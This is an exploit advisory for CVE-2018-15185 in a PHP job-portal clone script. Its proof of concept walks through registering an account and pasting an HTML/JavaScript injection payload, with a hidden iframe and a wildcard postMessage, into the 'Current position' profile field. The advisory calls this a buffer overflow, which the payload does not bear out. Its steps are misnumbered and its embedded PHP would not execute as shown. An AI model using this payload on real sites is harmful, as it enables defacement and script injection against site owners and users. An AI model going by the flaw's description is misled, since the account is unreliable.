*******************************
# Exploit Title: Naukri / Shine / Jobsite Clone Script -3.0.4 – has Buffer overflow Via Current position:
# Date: 01.08.2018
# Site Titel : Jobsite Clone Script
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/naukri-clone-script/
# Category: Web Application
# Version: 3.0.4
# Exploit Author: Vikas Chaudhary
# Published on : https://gkaim.com/cve-2018-15185-vikas-chaudhary/
# Contact: https://gkaim.com/contact-us/
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-15185

*******************************

## VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering
wide range of innovative. PHP Scripts Mall is a leading business and technology firm with 12 years
of successful track record in completion and implementation of numerous projects in various
verticals and domains.. It has 300 plus PHP scripts ready to buy.

## VULNERABILITY DESCRIPTION :- Buffer overflow occurs when a program tries to store more data in a
temporary storage area than it can hold. Writing outside the allocated memory area can corrupt the
data, crash the program or cause the execution of malicious code that can allow an attacker
to modify the target process address space.

************************
Proof of Concept:-
————————-
1. Go to the site
3- Select Register With Job Portal page (Register now) .
4- Create an account using your Email address ,Password and soo on
5- Verify your mail address and come back to site and sign in .
6- Go to Profile=> Edit Professional Details and put this code in Current position : =>

<!DOCTYPE html> <body onload="crossPwn()"> <h2>VIKAS</h2><iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>" name="<?php echo $_GET['name'] ?>" height="0" style="visibility:hidden"></iframe> <script> function crossPwn() { frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); // onresize document.getElementsByTagName('iframe')[0].src = '<?php echo $_GET["target"] ?>' + '#brute'; // onhashchange } </script> </body> </html>

and click on Save
6- You will see that VIKAS is Writen on Down and you can’t change or rename anything on this page – after pasting this code.

*********************************